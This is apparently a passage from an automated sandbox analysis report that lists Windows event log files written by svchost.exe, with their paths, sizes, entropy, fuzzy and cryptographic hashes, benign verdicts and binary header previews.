Preview:	ElfChnk.....................................0.......:........................................................................D.................b...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................;...c#..{1..k:...................v..........**..x............\|M.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.45779215578229077
Encrypted:	false
SSDEEP:	96:U2NVaO8sMa3Z85ZMLgrjjIZ3Z85ZQu3Z85Z7v3Z85Zu:UAV7pp8nMLEvUp8nDp8nLp8n
MD5:	7DDF5A276B0087A560964A33603C6CF2
SHA1:	6CAF593A6B373F46314D5B1F3F3E76D67EA6DEF7
SHA-256:	2D97C25ED370C5DABE11C700A868C0BBFEF27BDF740FE8104DFC0809C7DFB613
SHA-512:	3CDFA091F738672684152C2F13F7AB5259C6EF3B1DD693E359E883478D739277EBA90A6CB36B60EA1306A7F64B678089D0F7782544176A1DD29D6314ABFB9FE2
Malicious:	false
Preview:	ElfChnk.....................................P..............................................................................................................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.248110473220085
Encrypted:	false
SSDEEP:	1536:YbBN2A4VD7VAx8whAGU2woJQghYAxgRzAlUnF9:
MD5:	87681F2AD6FCB19982924DCE6A2D7A27
SHA1:	6C4D49C5504D6DE6E63B44753C607B3362B79B57
SHA-256:	1CA289F8F7FD7DD1D67EDA5691EF4B083120E456204CC8F6923AFCCD700183BC
SHA-512:	8F1309E5DD7B017945ABF5EB7E869AA1C04A27C37DB7C3A735A2CB31D815B67643D37DAD93FB89FFF2B6BC213EAE1E55201075DAEAFA39A6B1656A214990DEBA
Malicious:	false
Preview:	ElfChnk.........]...............]...............0...........................................................................>...............................................=...................................................................................%.......................................X...............?...............................................M...F.......................................................................................>...........................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.625347651139654
Encrypted:	false
SSDEEP:	1536:+XY5nVYIyyqED5BVZUevOBtNPhPVwCRPvf:+XY5nVYIyyqED5BVZUevOBtNPhPVwChf
MD5:	890CA9963C766DA05E491710E1CD9D7F
SHA1:	3F95AB4363D5DB533E60748F69A364196BAC8920
SHA-256:	47523E0AC40BC366CD0A86BE9A72ECEF3A72EE7D430B25A61D8DF55341C19531
SHA-512:	C2D739AE5ABF76C627DA8B863CC73FF31F7C7733138DB2954A3102377FD0270F69FE269EEAE0DE4172E53E194C3B71791CD09B36F880DC726665004FD9C6A07F
Malicious:	false
Preview:	ElfChnk.........................................`....:..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v.......................................................y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0424643703503667
Encrypted:	false
SSDEEP:	384:/hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorBort6ohorRorsor1orN:/DCRTh
MD5:	B6F126C0085E8F3D19928CC2ED46E73A
SHA1:	171B7A5ECC69E17659D7E4BA7BF869F2969CCF69
SHA-256:	B0E4D0D05D3821255226AAEA48241501E31EA40F049CB9CA96B6985F9B65EEE6
SHA-512:	BF77E294489B94E8A489C4A11DB22A0F8491327334C122E87EA72391A0EA1C0AD7ECC43EB9EA26CFFA6CC95C28F106A7D50A6F658C7312927C1726ACBB49DBF3
Malicious:	false
Preview:	ElfChnk.........)...............)............b...d...'a........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................E/..............])..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 207715216474546355539665747968.000000
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8526226240352849
Encrypted:	false
SSDEEP:	384:YhAiPA5PNPxPEPHPhPEPmPSPRP3PoPqP7DPfPqP/P:Y2NP
MD5:	585F5E645713292DF375B49B2BDC28EA
SHA1:	42531DC7FEDA50E16705A1260EC70B5AD7015FCB
SHA-256:	E16C3A02C9E22074AE98621BB170E12D41A54187FCC6D53B5600F5712F37A9FF
SHA-512:	0C0008188EC621D5FE00CF9211729347A941AF2DE55DA3333114D83B4D181FB8792C64FA0F62309660F51FF26349684D35EAC0A4E0FE98898D1C03CAAB65B434
Malicious:	false
Preview:	ElfChnk......................................%...&...A..................................................................... p..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8442469423268683
Encrypted:	false
SSDEEP:	384:DhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:DWXSYieD+tvgzmMvB2R387
MD5:	A12D2A18D158FA0E4EBA801B76795EAC
SHA1:	22C6C36D8E0ACD32735F5C0D25929CD734A2DB9F
SHA-256:	4A2A9FFE44AB14DE2504B3632FBDDC8EC4E3B35AFF6C5CCA75AB5095E164E39E
SHA-512:	729117B98F2FA8D18DD3A9B0A373EA5CD36A9B88BA54A45579DE0C50C68DABAB50096CC3078DDA1C11A7483D95CD6B39A54AF35282B1C2550F0AAE4A80F8BEA9
Malicious:	false
Preview:	ElfChnk......................................$...&.....i....................................................................x..(................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................&...............................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.267011945104217
Encrypted:	false
SSDEEP:	384:9hqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28O:9bCyhLfI931D
MD5:	D2CE26C80BD0C32F79B606F2AD1A54EB
SHA1:	77260713F9C29EF2C8BFFF4CE9E95B51A8003E62
SHA-256:	6C53DCA9EB6390EA9AE107605D3D8E24B1DD84F29431591589E26102F4133399
SHA-512:	792FA458EAF855AB738B5574F063F7D2EBF3FACF00C973E3E2795B3FC1E67AB29BC6857E2B28E6526B25EEF96E957FCD62B9030CA1C7314DDB3D4DB1CD7D7718
Malicious:	false
Preview:	ElfChnk.........P...............P...........p.........b}....................................................................1.>h................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......6t..............................................................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.4167677203077242
Encrypted:	false
SSDEEP:	768:lcMhFBuyKskZljdoKXjtT/r18rQXn8uwgSj70FTP:GMhFBuV80
MD5:	6B644AF0992B17A39AE8ECCCE8D52371
SHA1:	B7C16851857F0A32C01DA8BA4F3BC9CD70B61FC5
SHA-256:	1807F395B6FA66E27A915D4657E67AF6F4DC6EB3500632AF389F2508EA60457D
SHA-512:	59E5498E32F34E48BF2C8C6A613AC61132F54D6558FF0DFF09CD023180519A8FD266FBD40CA2B6F24A1EEAA55040359C4060374E81E1E93720437CA6D70B9BCA
Malicious:	false
Preview:	ElfChnk.........P...............P...............h....7.c.......................................................................F................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.899710510612546
Encrypted:	false
SSDEEP:	768:AtvigdzejvAzBCBao/F6Cf2SEqEhwaK41HZalMIq9Iz6IOTLGfFXN/E:aFH+dqWzrhFXN/E
MD5:	BAD1AE6E5B5E3828EAC3BB72057462EA
SHA1:	FF055B8560C3014432C8B95D5A0BFFA903AE4400
SHA-256:	F57EE742E86BC90D509D8D3EE1F8FED75A8B76BC09A427376C7F5F5AE0760339
SHA-512:	630FAEC55EA1AD429921EBA196D78685D8DEF49F9D9FB9A45462F65A809823A837030C1C137A96767EDA9AEB710CB4A847B190232F53516302B9402D110FF92C
Malicious:	false
Preview:	ElfChnk.w...............w.............................E....................................................................,.G.................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..H...w...........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0943130840504693
Encrypted:	false
SSDEEP:	384:Rh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDq:RMAP1Qa5AgfQQhC
MD5:	857D79A241171E746E060E429FC2560B
SHA1:	99B6F61CCD3AD8F9D82712B04B4E51701E693CC8
SHA-256:	7DDE0A893BD2EAE686B5AD71D1AA76FE4E666D328E463E646FDB63F8B2468FDA
SHA-512:	3AF01C2C89D004ACD0E5A6861BE2A3B0B819F23B92BB4C3466BC2630131E246AD3CA4151C7A84A338D86555F8F3FE989779E4AEA282ED2B8A00E23D0668A4CFC
Malicious:	false
Preview:	ElfChnk.....................................hi..hl.....&.....................................................................R.=................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........Y...............................&..............;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.441475404183629
Encrypted:	false
SSDEEP:	768:ZbM5eahvB94LSAoiMTQMrj+/IVvu4mJY0YCOO:dMAaZBLzn6fYZO
MD5:	B7F318BB9FA336235CCBE5A391775D8E
SHA1:	F7F7CFF57A6BB00B4E6F17E39BAAF2443E08878D
SHA-256:	D59515423F15D3618746447E1333945BF1432B9B4C20B54849050CE17C72311D
SHA-512:	1C8FA8FD31BC4A3C6815A473C00187497E7E71CAF1FAD61F5A6D73DBEB6AE9D551A3DAA6B39B76A4D1401A061844036D5D06469A3942BC030B276D4E186C7289
Malicious:	false
Preview:	ElfChnk.r...............r...................0.......A..@....................................................................k...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F....................+...............)......55......................&.......E....@......M#..............u7.......1.........../...........!..]>......**......r.......R...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 8448-4108, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 308596736.000000
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.4699263306571524
Encrypted:	false
SSDEEP:	384:6hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klq:61T4hu7OJscMmza
MD5:	86173450A7EE15BC5B6A2C667DD3B040
SHA1:	200635B7FB3137AB9A33A6551182F4BA05BDCE84
SHA-256:	AEDE5AAE515D2A3C78BA23C631D178DCCB3E775CD3B4FB6F0406887FAEDE5B88
SHA-512:	3A73438F1A7B3B2F166B2B2F70E713F7393A2F2D5DF23858D05F2790BD2DF5B2CDC38263EC72ECC34621C82C44308E3C0474E295C678642E30146CAC27D69067
Malicious:	false
Preview:	ElfChnk.........s...............s..............x....,........................................................................5.................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.450965793914843
Encrypted:	false
SSDEEP:	384:phFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfO:pzSKEqsMuy6CL3
MD5:	3914FD52494E203A25B69F9F4221031F
SHA1:	8046E0D1C78A47632A4550AC66FC9917E6429457
SHA-256:	D2D37391EC1325C6C27486311C5B5E1D11C55D0A464270F009E3D3E1B2A54D3B
SHA-512:	12FB89D2F9A5B19C7150D23A09A7C7B3F5616C09C8A83AE83A331263F0FA45181066F1A44080A46FE3A9F551BDF56485BD03DB9001FE82388DCDB1EF3FBC7829
Malicious:	false
Preview:	ElfChnk.........L...............L...................=....................................................................... ..H................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................`..............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1568075545974956
Encrypted:	false
SSDEEP:	384:ZhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zg:Zmw9g3LCjg
MD5:	F3CF496665845DA6C957242770973ECE
SHA1:	BF7206ECD6C6ABE687BE10A157C86C7EBE59C6BD
SHA-256:	BB190FF3FA391F3B69F3E4509B14D6DE320C980D69A59BC74DBD57BD8AA42F7F
SHA-512:	EA5A2D21353556B5B6FC420671E5F7026B6A280C7CD740CD1CAFA2C958318B5BB6A5F4AE6A00450E2A7997425A0AAAFFD158452401ABB732CA985A8DE3548213
Malicious:	false
Preview:	ElfChnk.........6...............6...........(o...p..........................................................................y.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n........X..............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.8853799397148268
Encrypted:	false
SSDEEP:	384:5hCI2LwuSsYI8tIbLIYoI/IE6IQsIhIxIUIfIXIAI2I/IRIvI:5Z
MD5:	FACBCFA717058EFCED1754221D6A421D
SHA1:	1BA10B3E2BB8A2C739257CE228789E2D6C4F1A1D
SHA-256:	6F6A7779828D79A41F94AF9EE452BB44EE0E495D27A5B5DE7DAD659A6865C9CB
SHA-512:	0253FDCC88D3E52A9A26A065AC0C4E264DC0E84CB6A175D09BEC79E56D5282B9B95DCE2FEF47C48505D34C629388904AA6E2BDFF81759920FE314D6F9F5A6DB0
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...............@6..u..B.....................................................................w..................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**......K.......1E..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 130, DIRTY
Category:	dropped
Size (bytes):	70168
Entropy (8bit):	4.524773468886577
Encrypted:	false
SSDEEP:	768:38Ho4AS8Ho4AoEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4d:zp
MD5:	6FE5DD5128393DA4CD3DB4D22C0312F5
SHA1:	D8BC98927CA24FE6D41AFEC14B9C4618C5C9C7BA
SHA-256:	3F69F116AEC3EFFDEA78FCAB92926C1031791B3EF077CBDF9B87AD69E06EFABB
SHA-512:	9DEBFF259802DE682E04B808B29E058BF39573CDEE78736E8CF6E9C557A59ACA5D2E69E47328E306AECDE87DDA50F9985016CE0C5B60439C4F7C8B4BD3928C72
Malicious:	false
Preview:	ElfFile.....................................................................................................................T...ElfChnk.~...............~...........................M.l.......................................................................ZG................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..x...~.......Rirz`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	75888
Entropy (8bit):	5.583856889071563
Encrypted:	false
SSDEEP:	384:hhoa5J29o2KFzyzIz9a5bzuzNz0zxzuewKWMKOa5KVhoa5J29o2KFzyzIz9a5bzL:hMXVMXYpytFNZHXdKglQA303eu
MD5:	0CF4F79ECF2FCEBE97CFD24865A481A7
SHA1:	88A573A9E2BA5ECE60B08F52B5A965342ABD815C
SHA-256:	11FD04D741B84E8437C7B86586672147A1DCDBAF9EC8E443B77085FC93E53A9B
SHA-512:	6B8A75E262680F3E325B32F390D2DF1449765B9B6803FE7136E9235F4BF56C4C629D0CBC724CDE41265532079034BE01A1C970E8B77B015EABCC974E2C2FB4AB
Malicious:	false
Preview:	ElfChnk......................................$..p(..e.........................................................................T................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&....................................................................%..........**............................E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0596696487276978
Encrypted:	false
SSDEEP:	384:Qh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpHMXmM+ZM6Zz:QeJ+
MD5:	F6D375E51341AC949A73803CF00B96E6
SHA1:	5DB3BF9A34145DD777EA9593DE3C8054B08A11D1
SHA-256:	EBDFA834049A08F8FC9B3DD35800233E75BDB480D59E548D7F4F3F2720B889F9
SHA-512:	1714A4243ECEB63E23583F31D3D6C161D8423E1AD2D1E1440545718E6DA879F74C2F03E5C21120ED826093777F6DEEEFEC57B913E1B4C1D74C0B8A473752460B
Malicious:	false
Preview:	ElfChnk.........................................X0.....!....................................................................B...........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6(..............................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.241268628600426
Encrypted:	false
SSDEEP:	384:Thk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1/:TBjdjP0csQqL
MD5:	602FD635C1BE2C0F087784BAE052554B
SHA1:	77EE62511C78BA6989DF77AC6B616422A44D7F54
SHA-256:	78FC5D1D71915650A8080B217B8B28F799B054F35C89AAB2C474DC4B9C3F0581
SHA-512:	8A66621CE4233D42AE83A0046A04628F4A88D91713C064944A61AFDF3F33D44E54E416A8441D1FFFDDCEA2E909761BBF151894881B4F93C0D238537939E21217
Malicious:	false
